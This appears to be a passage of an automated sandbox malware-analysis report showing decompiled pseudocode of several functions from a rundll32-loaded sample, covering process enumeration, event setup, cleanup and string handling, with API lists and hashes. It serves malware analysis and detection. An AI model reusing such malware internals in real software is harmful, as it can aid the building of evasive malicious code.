                                Function 04288F1B, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E04288F1B() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x428d2a8; // 0xaea5a8
						_t2 = _t9 + 0x428ee34; // 0x73617661
						_push( &_v264);
						if( *0x428d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                0x04288f26
                                0x04288f30
                                0x04288f34
                                0x04288f3e
                                0x04288f6f
                                0x04288f45
                                0x04288f4a
                                0x04288f57
                                0x04288f60
                                0x04288f77
                                0x04288f62
                                0x04288f6a
                                0x00000000
                                0x04288f6a
                                0x04288f78
                                0x04288f79
                                0x00000000
                                0x04288f79
                                0x00000000
                                0x04288f73
                                0x04288f7f
                                0x04288f84

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04288F2B
                                • Process32First.KERNEL32(00000000,?), ref: 04288F3E
                                • Process32Next.KERNEL32(00000000,?), ref: 04288F6A
                                • CloseHandle.KERNEL32(00000000), ref: 04288F79
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 9ee3a8227f45d58d91d89330faaf044b0808f5da1d62e4b253beaf15b9e89190
                                • Instruction ID: 46daec41ecb51dc03694c2cc214681c93d80d71f354c7b9653b84528bc689d0c
                                • Opcode Fuzzy Hash: 9ee3a8227f45d58d91d89330faaf044b0808f5da1d62e4b253beaf15b9e89190
                                • Instruction Fuzzy Hash: C4F0FC313131246AE720B6269C08DEF726DDB95714F800159E905C3082FA64EA45C761
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04288C01, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04288C01(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                0x04288c0b
                                0x04288c0f
                                0x04288c24
                                0x04288c26
                                0x04288c2b
                                0x04288c31
                                0x04288c33
                                0x04288c38
                                0x04288c43
                                0x04288c3a
                                0x04288c3a
                                0x04288c3a
                                0x04288c38
                                0x04288c51

                                APIs
                                • memset.NTDLL ref: 04288C0F
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 04288C24
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 04288C31
                                • CloseHandle.KERNEL32(?), ref: 04288C43
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: a0d3d0885ae14193b84a087642f8b6d9978d46d51babd95f28b92dda2d7d3e9a
                                • Instruction ID: a02547673a5d223073be06a69ab013d4ad39ce853cd6ed9c9ef489fb03dae0a1
                                • Opcode Fuzzy Hash: a0d3d0885ae14193b84a087642f8b6d9978d46d51babd95f28b92dda2d7d3e9a
                                • Instruction Fuzzy Hash: 23F0BEB1202308BFD3147F26DCC4C2FBBACEF51299B11892EF04282551D672BC488AB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04284DB1, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04284DB1() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x428d26c; // 0x2c4
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x428d2bc; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x428d26c; // 0x2c4
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x428d238; // 0x4980000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                0x04284db1
                                0x04284db8
                                0x04284e02
                                0x04284e04
                                0x04284e04
                                0x04284dbc
                                0x04284dc2
                                0x04284dc7
                                0x04284dcb
                                0x04284dd1
                                0x04284dd8
                                0x00000000
                                0x00000000
                                0x04284dda
                                0x04284ddf
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04284ddf
                                0x04284de1
                                0x04284de9
                                0x04284dec
                                0x04284dec
                                0x04284df2
                                0x04284df9
                                0x04284dfc
                                0x04284dfc
                                0x00000000

                                APIs
                                • SetEvent.KERNEL32(000002C4,00000001,04287F41), ref: 04284DBC
                                • SleepEx.KERNEL32(00000064,00000001), ref: 04284DCB
                                • CloseHandle.KERNEL32(000002C4), ref: 04284DEC
                                • HeapDestroy.KERNEL32(04980000), ref: 04284DFC
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: f7ecafeef3f66674b10b0bc5f51e64dbd1c69b23f3415c42137665bf68ae1e14
                                • Instruction ID: ae062675467100e7eed306c3b64ae00c190a536e9d3cbe540c0c3985e55355fc
                                • Opcode Fuzzy Hash: f7ecafeef3f66674b10b0bc5f51e64dbd1c69b23f3415c42137665bf68ae1e14
                                • Instruction Fuzzy Hash: 7BF0127572331397EA207A3EB94CF0E3A98EB047A1704461CB910D76C5EF68EC44D660
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04288CFA, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E04288CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04281525(_t2);
				if(_t34 != 0) {
					_t30 = E04281525(_t28);
					if(_t30 == 0) {
						E04288B22(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0428A7C2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0428A7C2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                0x04288cfa
                                0x04288d04
                                0x04288d06
                                0x04288d0c
                                0x04288d0c
                                0x04288d15
                                0x04288d19
                                0x04288d25
                                0x04288d29
                                0x04288d9d
                                0x04288d2b
                                0x04288d2b
                                0x04288d2f
                                0x04288d34
                                0x04288d39
                                0x04288d53
                                0x04288d42
                                0x04288d42
                                0x04288d46
                                0x04288d49
                                0x04288d4e
                                0x04288d4e
                                0x04288d58
                                0x04288d80
                                0x04288d86
                                0x04288d89
                                0x04288d5a
                                0x04288d5c
                                0x04288d64
                                0x04288d6f
                                0x04288d74
                                0x04288d74
                                0x04288d90
                                0x04288d97
                                0x04288d98
                                0x04288d98
                                0x04288d29
                                0x04288da8

                                APIs
                                • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,04289816,?,?,?,?,00000102,0428937B,?,?,00000000), ref: 04288D06
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                  • Part of subcall function 0428A7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04288D34,00000000,00000001,00000001,?,?,04289816,?,?,?,?,00000102), ref: 0428A7D0
                                  • Part of subcall function 0428A7C2: StrChrA.SHLWAPI(?,0000003F,?,?,04289816,?,?,?,?,00000102,0428937B,?,?,00000000,00000000), ref: 0428A7DA
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04289816,?,?,?,?,00000102,0428937B,?), ref: 04288D64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04288D74
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04288D80
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: c60aa9715ecf730e22e8fe83ec59d980197e9c033cf62d7e7176c4c14112557f
                                • Instruction ID: 0cc836d0d241d64fc1c47648071756f930f8e6c84a443cced236f04e3a52f67a
                                • Opcode Fuzzy Hash: c60aa9715ecf730e22e8fe83ec59d980197e9c033cf62d7e7176c4c14112557f
                                • Instruction Fuzzy Hash: BB21F032722216ABDB027F79D844AAE7FB8AF16284B448059F805DB280DB34E900C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0428272D, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0428272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04281525(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                0x04282742
                                0x04282746
                                0x04282750
                                0x04282755
                                0x0428275a
                                0x0428275c
                                0x04282764
                                0x04282769
                                0x04282777
                                0x0428277c
                                0x04282786

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,04D7935C,?,04285398,004F0053,04D7935C,?,?,?,?,?,?,04287CCB), ref: 0428273D
                                • lstrlenW.KERNEL32(04285398,?,04285398,004F0053,04D7935C,?,?,?,?,?,?,04287CCB), ref: 04282744
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,04285398,004F0053,04D7935C,?,?,?,?,?,?,04287CCB), ref: 04282764
                                • memcpy.NTDLL(74E069A0,04285398,00000002,00000000,004F0053,74E069A0,?,?,04285398,004F0053,04D7935C), ref: 04282777
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: 646d63f260f149e44949d89b42dfbb9cb856f1d00c1b838371fd1722998f97d0
                                • Instruction ID: b4008b879369725d7e368c23b0ecbce6d9077f6b20bda919ba4457c05d3a508f
                                • Opcode Fuzzy Hash: 646d63f260f149e44949d89b42dfbb9cb856f1d00c1b838371fd1722998f97d0
                                • Instruction Fuzzy Hash: 7CF03732A11119BBCB11AFA9CC84C9E7BADEF082987018066A90497241EA75EA108BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0428A677, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(04D79B08,00000000,00000000,7691C740,04289DCB,00000000), ref: 0428A687
                                • lstrlen.KERNEL32(?), ref: 0428A68F
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • lstrcpy.KERNEL32(00000000,04D79B08), ref: 0428A6A3
                                • lstrcat.KERNEL32(00000000,?), ref: 0428A6AE
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: bbbc518d69ed9459dd40a5087594fbe0dc9b81b2d9f68069844c4b93e1ea3a33
                                • Instruction ID: 6538ddc293500b4d0f5936d18226c9a959b421e46c0a0c0c351432bcfd773b21
                                • Opcode Fuzzy Hash: bbbc518d69ed9459dd40a5087594fbe0dc9b81b2d9f68069844c4b93e1ea3a33
                                • Instruction Fuzzy Hash: D1E06D33603221678611AAA9BC4CC9FBAACEE89691304041AF600D3100CB299C068BA1
                                Uniqueness

                                Uniqueness Score: -1.00%